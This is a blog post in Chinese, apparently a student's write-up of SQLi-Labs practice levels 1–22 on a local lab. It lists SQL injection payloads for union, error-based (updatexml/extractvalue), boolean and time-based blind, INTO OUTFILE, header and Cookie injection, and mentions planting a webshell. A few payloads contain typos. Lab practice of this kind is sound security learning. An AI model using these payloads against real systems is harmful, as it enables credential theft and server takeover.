<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>SQLi-Labs周报 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="周报sqli-labes刷题记录SQL注入首先先判断是字符还是数字型，再根据报错找闭合方式，判断有多少列,查库名，表名，列名 order by 2–+&#x2F;#union select 1,databases()–+union selcet 1,table_name from information_schema.tables where table_schema&#x3D;””–+union">
<meta property="og:type" content="article">
<meta property="og:title" content="SQLi-Labs周报">
<meta property="og:url" content="https://fun9563.github.io/2026/02/13/weekly-report/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="周报sqli-labes刷题记录SQL注入首先先判断是字符还是数字型，再根据报错找闭合方式，判断有多少列,查库名，表名，列名 order by 2–+&#x2F;#union select 1,databases()–+union selcet 1,table_name from information_schema.tables where table_schema&#x3D;””–+union">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-1.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-2.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-3.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-4.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-5.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-6.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-8.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-9.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-10.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-11.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-12.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-13.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-14.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-15.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-16.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-17.png">
<meta property="og:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image-18.png">
<meta property="article:published_time" content="2026-02-12T16:00:00.000Z">
<meta property="article:modified_time" content="2026-02-14T08:02:37.615Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://fun9563.github.io/2026/02/13/weekly-report/image.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 8.1.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://fun9563.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-weekly-report" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2026/02/13/weekly-report/" class="article-date">
  <time class="dt-published" datetime="2026-02-12T16:00:00.000Z" itemprop="datePublished">2026-02-13</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      SQLi-Labs周报
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="周报"><a href="#周报" class="headerlink" title="周报"></a>周报<br><br><br></h1><h2 id="sqli-labes刷题记录"><a href="#sqli-labes刷题记录" class="headerlink" title="sqli-labes刷题记录"></a>sqli-labes刷题记录<br></h2><h2 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入<br><br><br></h2><p>首先先判断是字符还是数字型，再根据报错找闭合方式，判断有多少列,查库名，表名，列名<br></p>
<h3 id="order-by-2–"><a href="#order-by-2–" class="headerlink" title="order by 2–+&#x2F;#"></a>order by 2–+&#x2F;#<br></h3><h3 id="union-select-1-databases-–"><a href="#union-select-1-databases-–" class="headerlink" title="union select 1,databases()–+"></a>union select 1,databases()–+<br></h3><h3 id="union-selcet-1-table-name-from-information-schema-tables-where-table-schema-””–"><a href="#union-selcet-1-table-name-from-information-schema-tables-where-table-schema-””–" class="headerlink" title="union selcet 1,table_name from information_schema.tables where table_schema&#x3D;””–+"></a>union selcet 1,table_name from information_schema.tables where table_schema&#x3D;””–+<br></h3><h3 id="union-select-1-column-name-from-information-schema-columns-where-table-schema-””-and-table-name-””–"><a href="#union-select-1-column-name-from-information-schema-columns-where-table-schema-””-and-table-name-””–" class="headerlink" title="union select 1,column_name from information_schema&gt;columns where table_schema&#x3D;”” and table_name&#x3D;””–+"></a>union select 1,column_name from information_schema&gt;columns where table_schema&#x3D;”” and table_name&#x3D;””–+<br></h3><h3 id="如果遇到显示位问题用group-concat-或者limit"><a href="#如果遇到显示位问题用group-concat-或者limit" class="headerlink" title="如果遇到显示位问题用group_concat(),或者limit"></a>如果遇到显示位问题用group_concat(),或者limit<br></h3><p>1.(字符型)<br><br>2.-1(回显问题)<br><br>3.’)闭合方式，-1显示位<br><br>4.”)闭合方式，-1显示位<br><br>5.有报错无回显使用updatexml(1,concat(0x7e,(……),0x7e),1)–+,制造报错带出库名，这题有回显限制?id&#x3D;1’+or+updatexml(1,concat(0x7e,(select+concat(username,0x3a,password)+from+users+limit+0,1),0x7e),1)–+(limit精确查找)<br><br>6.同上，这里的闭合为”<br><br></p>
<h1 id="7-这题不会找了wp看"><a href="#7-这题不会找了wp看" class="headerlink" title="7.这题不会找了wp看"></a>7.这题不会找了wp看</h1><p>先测试闭合方式为’)),再找字段数还是3,这题的提示是outfile<br><br><img src="/2026/02/13/weekly-report/image.png" alt="alt text"><br><br><br><br>上菜鸟和一些wp看了一下，有两种做法，一是导出数据，二是传木马连蚁剑<br><br>首先先要获取网站的绝对路径，所以可以去less1有回显的去注入（@@datadir获取数据库存储数据路径 ，@@basedir是MYSQL获取安装路径）<br><br><br><br><img src="/2026/02/13/weekly-report/image-1.png" alt="alt text"><br><br><br>由于网站是在WWW目录下，所以绝对路径在D:\phpstudy_pro\WWW&lt;br&gt;<br><br><img src="/2026/02/13/weekly-report/image-2.png" alt="alt text"></p>
<h3 id="回显正常，是有读取的权限的，接下来把数据取出到另一个页面再传入木马"><a href="#回显正常，是有读取的权限的，接下来把数据取出到另一个页面再传入木马" class="headerlink" title="回显正常，是有读取的权限的，接下来把数据取出到另一个页面再传入木马"></a>回显正常，是有读取的权限的，接下来把数据取出到另一个页面再传入木马</h3><h2 id="id-1’-union-select-1-2-3-into-outfile-“”D-phpstudy-pro-WWW-sqli-labs-Less-7-test-txt””–-这里无语到了，没发现我的路径是sqli-labs，路径错了一直取不出来"><a href="#id-1’-union-select-1-2-3-into-outfile-“”D-phpstudy-pro-WWW-sqli-labs-Less-7-test-txt””–-这里无语到了，没发现我的路径是sqli-labs，路径错了一直取不出来" class="headerlink" title="?id&#x3D;1’)) union select 1,2,3 into outfile “”D:&#x2F;phpstudy_pro&#x2F;WWW&#x2F;sqli-labs&#x2F;Less-7&#x2F;test.txt””–+这里无语到了，没发现我的路径是sqli-labs，路径错了一直取不出来"></a>?id&#x3D;1’)) union select 1,2,3 into outfile “”D:&#x2F;phpstudy_pro&#x2F;WWW&#x2F;sqli-labs&#x2F;Less-7&#x2F;test.txt””–+这里无语到了，没发现我的路径是sqli-labs，路径错了一直取不出来<br><br><br></h2><p><img src="/2026/02/13/weekly-report/image-3.png" alt="alt text"><br><br><br></p>
<h2 id="太难受了我木马能传上去却一直访问不了，不知道什么原因导致的Apache有一个僵尸进程一直占用我的82端口，我花了2，3小时在找原因删进程换端口，后面在Apacheconf里面重新加了端口可是还是访问不上，我又排查了好久发现pspstudy传的木马只会访问到他的根目录下D-phpstudy-pro-WWW-sqli-labs，我一直放在后面的-Less-7难怪一直读不到，虽然和这题没什么关系但是我还是想吐槽一下这几个坑。"><a href="#太难受了我木马能传上去却一直访问不了，不知道什么原因导致的Apache有一个僵尸进程一直占用我的82端口，我花了2，3小时在找原因删进程换端口，后面在Apacheconf里面重新加了端口可是还是访问不上，我又排查了好久发现pspstudy传的木马只会访问到他的根目录下D-phpstudy-pro-WWW-sqli-labs，我一直放在后面的-Less-7难怪一直读不到，虽然和这题没什么关系但是我还是想吐槽一下这几个坑。" class="headerlink" title="太难受了我木马能传上去却一直访问不了，不知道什么原因导致的Apache有一个僵尸进程一直占用我的82端口，我花了2，3小时在找原因删进程换端口，后面在Apacheconf里面重新加了端口可是还是访问不上，我又排查了好久发现pspstudy传的木马只会访问到他的根目录下D:\phpstudy_pro\WWW\sqli-labs，我一直放在后面的&#x2F;Less-7难怪一直读不到，虽然和这题没什么关系但是我还是想吐槽一下这几个坑。"></a>太难受了我木马能传上去却一直访问不了，不知道什么原因导致的Apache有一个僵尸进程一直占用我的82端口，我花了2，3小时在找原因删进程换端口，后面在Apacheconf里面重新加了端口可是还是访问不上，我又排查了好久发现pspstudy传的木马只会访问到他的根目录下D:\phpstudy_pro\WWW\sqli-labs，我一直放在后面的&#x2F;Less-7难怪一直读不到，虽然和这题没什么关系但是我还是想吐槽一下这几个坑。</h2><p><img src="/2026/02/13/weekly-report/image-4.png" alt="alt text"><br><br><br><br><img src="/2026/02/13/weekly-report/image-5.png" alt="alt text"><br><br><br></p>
<h1 id="蚁剑连一下"><a href="#蚁剑连一下" class="headerlink" title="蚁剑连一下"></a>蚁剑连一下<br><br><br><br></h1><h1 id="8"><a href="#8" class="headerlink" title="8."></a>8.<br></h1><p>先测试出了闭合方式’，这题没有报错回显，试了一下updatexml没反应，考虑用布尔盲注<br><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_41905135/article/details/150509520">https://blog.csdn.net/weixin_41905135/article/details/150509520</a>  参考了这篇关于布尔盲注的博客<br><br>GET &#x2F;Less-8&#x2F;?id&#x3D;1’+and+length(database())&#x3D;8–+ HTTP&#x2F;1.1(先探测出数据库名长度)<br><br>GET &#x2F;Less-8&#x2F;?id&#x3D;1’+and+substring(database(),1,1)&#x3D;’s’–+ HTTP&#x2F;1.1（根据回显判断库名第一位字母以此类推得出完整库名）<br><br>GET &#x2F;Less-8&#x2F;?id&#x3D;1’+and+substring(database(),1,8)&#x3D;’security’–+ HTTP&#x2F;1.1(其实我已经知道库名了，如果不知道的话用ASCII码的二分查找更加便捷【ASCII(…) &gt; 78】)<br><br>接下来找表的数量1’+and+(select+count(table_name)+from+information_schema.tables+where+table_schema&#x3D;”security”)&#x3D;4–+<br><br>GET &#x2F;Less-8&#x2F;?id&#x3D;1’+and+length((select+table_name+from+information_schema.tables+where+table_schema&#x3D;”security”+limit+3,1))&#x3D;5–+ (探测出第四个表名长度总共为5)<br><br>GET &#x2F;Less-8&#x2F;?id&#x3D;1’+and+substring((select+table_name+from+information_schema.tables+where+table_schema&#x3D;”security”+limit+3,1),1,1)&#x3D;’u’–+ HTTP&#x2F;1.1（卡开始探测第4个表名<br><br>GET &#x2F;Less-8&#x2F;?id&#x3D;1’+and+(select+count(column_name)+from+information_schema.columns+where+table_schema&#x3D;”security”+and+table_name&#x3D;”users”)&#x3D;3–+(列数)<br><br>GET &#x2F;Less-8&#x2F;?id&#x3D;1’+and+substring((select+column_name+from+information_schema.columns+where+table_schema&#x3D;”security”+and+table_name&#x3D;”users”+limit+1,1),1,8)&#x3D;’username’–+ (查出列名username,和password)<br><br>最后提取出数据，这里跳过了，推荐使用sqlmap<br><br><br><br></p>
<h1 id="9-时间盲注"><a href="#9-时间盲注" class="headerlink" title="9.时间盲注"></a>9.时间盲注</h1><p>返现无论输入什么回显都没变化，第一时间想到时间盲注<strong>sleep</strong>函数进行测试<br><br><strong>IF( 判断条件 , 位置 A (真值位) , 位置 B (假值位) )</strong><br><br>GET &#x2F;Less-9&#x2F;?id&#x3D;1’+and+if(1&#x3D;1,sleep(5),1)–+(判断闭合符号)<br><br>GET &#x2F;Less-9&#x2F;?id&#x3D;1’+and+if(length(database())&#x3D;8,sleep(3),1)–+ HTTP&#x2F;1.1(配合正常的布尔盲注来找出库名，表名，……)<br><br>GET &#x2F;Less-9&#x2F;?id&#x3D;1’+and+if((select+count(table_name)+from+information_schema.tables+where+table_schema&#x3D;”security”)&#x3D;4,sleep(3),1)–+<br></p>
<h3 id="以此类推"><a href="#以此类推" class="headerlink" title="以此类推"></a>以此类推<br><br><br></h3><h1 id="10-仍然是时间盲注闭合符号为”"><a href="#10-仍然是时间盲注闭合符号为”" class="headerlink" title="10.仍然是时间盲注闭合符号为”"></a>10.仍然是时间盲注闭合符号为”<br></h1><p>这题同上只有闭合方式变了<br><br><br></p>
<h1 id="11-登入框注入"><a href="#11-登入框注入" class="headerlink" title="11.登入框注入"></a>11.登入框注入<br></h1><p>uname&#x3D;1’ order by 2#&amp;passwd&#x3D;123&amp;submit&#x3D;Submit(两列)接下来正常注<br><br><img src="/2026/02/13/weekly-report/image-6.png" alt="alt text"><br><br>显示位有限制使用limit<br><br><br><br></p>
<h1 id="12"><a href="#12" class="headerlink" title="12"></a>12<br></h1><p>闭合是”),同上<br></p>
<h1 id="13"><a href="#13" class="headerlink" title="13 "></a>13 <br></h1><p>闭合为’),正常使用updatexml制造报错带出回显<br><br><img src="/2026/02/13/weekly-report/image-8.png" alt="alt text"><br><br><br></p>
<h1 id="14"><a href="#14" class="headerlink" title="14"></a>14<br></h1><p>判断闭合为”,这同上只有闭合符号不同<br></p>
<h1 id="15-登录框的布尔逻辑盲注"><a href="#15-登录框的布尔逻辑盲注" class="headerlink" title="15.登录框的布尔逻辑盲注 "></a>15.登录框的布尔逻辑盲注 <br></h1><p><img src="/2026/02/13/weekly-report/image-9.png" alt="alt text"><br><br>这里就只注到列名，剩下不注入了同上<br><br><br></p>
<h1 id="16-闭合方式为”的登录框布尔盲注，同上"><a href="#16-闭合方式为”的登录框布尔盲注，同上" class="headerlink" title="16.闭合方式为”的登录框布尔盲注，同上"></a>16.闭合方式为”的登录框布尔盲注，同上<br><br><br></h1><h1 id="17-密码重置"><a href="#17-密码重置" class="headerlink" title="17.密码重置"></a>17.密码重置<br></h1><p>这题后端usname有过滤，使用注入点为passwd,所以usenam要一个已经存在的账户名admin，开始注入，使用updatexml报错注入<br><br><img src="/2026/02/13/weekly-report/image-10.png" alt="alt text"><br><br><img src="/2026/02/13/weekly-report/image-11.png" alt="alt text"><br><br>update、delete或insert语句的子查询中，不能直接引用正在被修改的表。这里要骗过 MySQL，我们需要让它认为我们查询的不是 users 表，而是一张临时表<br><br>嵌套子查询。把 SELECT 语句套在另一个 SELECT 里面，并加上 as 别名<br><br>uname&#x3D;admin&amp;passwd&#x3D;1’ and updatexml(1,concat(0x7e,(select concat(username,password) from <strong>(select * from users) as tmp where username&#x3D;’admin’</strong> limit 0,1),0x7e),1)–+&amp;submit&#x3D;Submit<br><br><br></p>
<h1 id="18-header头注入"><a href="#18-header头注入" class="headerlink" title="18.header头注入"></a>18.header头注入<br></h1><p>这题要先登录才能注入，测试了一下发现注入点在User-Agent,闭合符号为’<br><br><strong>INSERT INTO uagents (uagent, ip, uname) VALUES (‘$UA’, ‘$IP’, ‘$NAME’)</strong>(后端)<br><br><img src="/2026/02/13/weekly-report/image-12.png" alt="alt text"><br><br><img src="/2026/02/13/weekly-report/image-13.png" alt="alt text"><br><br><img src="/2026/02/13/weekly-report/image-14.png" alt="alt text"><br><strong>后端的values需要三个匹配，extractvalue(1, payload) 只需要两个参数</strong><br><br><strong>‘,extractvalue(1,concat(0x7e,(select concat(username,password) from users limit 8,1),0x7e)),1)#</strong><br><br><br></p>
<h1 id="19-referer注入"><a href="#19-referer注入" class="headerlink" title="19.referer注入"></a>19.referer注入<br></h1><p><strong>INSERT INTO referers (referer, ip_address) VALUES (‘$uagent’, ‘$IP’)</strong><br><br><img src="/2026/02/13/weekly-report/image-15.png" alt="alt text"><br><br>根据后端填充注入，同上<br></p>
<h1 id="20-Cookie注入"><a href="#20-Cookie注入" class="headerlink" title="20 Cookie注入"></a>20 Cookie注入<br></h1><p><img src="/2026/02/13/weekly-report/image-16.png" alt="alt text"><br><br>这题不知道什么原因我登录完没给我cookie，看了源码这题登录后应该会给我重定向给我Cookie，但是burp上一直没收到，这里直接自己改成了GET请求加上了Cookie<br><img src="/2026/02/13/weekly-report/image-17.png" alt="alt text"><br><br><strong>updatexml</strong><br><br><br></p>
<h1 id="21-Cookie注入"><a href="#21-Cookie注入" class="headerlink" title="21.Cookie注入"></a>21.Cookie注入<br></h1><p><img src="/2026/02/13/weekly-report/image-18.png" alt="alt text"><br><br>base64加密，闭合方式为’)<br><br><br></p>
<h1 id="22-alt-text-weekly-report-image-19-png"><a href="#22-alt-text-weekly-report-image-19-png" class="headerlink" title="22.![alt text]weekly-report&#x2F;image-19.png)"></a>22.![alt text]weekly-report&#x2F;image-19.png)<br></h1><p>同上，闭合方式为”,需要base64加密</p>
<div style="padding: 15px; background-color: #e7f3fe; border-left: 6px solid #2196F3; border-radius: 5px;">
    <strong>ℹ️ 提示：</strong> 
    
</div>
      
    </div>
    <footer class="article-footer">
      <a data-url="https://fun9563.github.io/2026/02/13/weekly-report/" data-id="cuidRsbHnBRhHP2VIyREtQGpE" data-title="SQLi-Labs周报" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2026/02/14/ctf-practice-1/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2026/02/">February 2026</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2026/02/14/ctf-practice-1/">(no title)</a>
          </li>
        
          <li>
            <a href="/2026/02/13/weekly-report/">SQLi-Labs周报</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2026 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>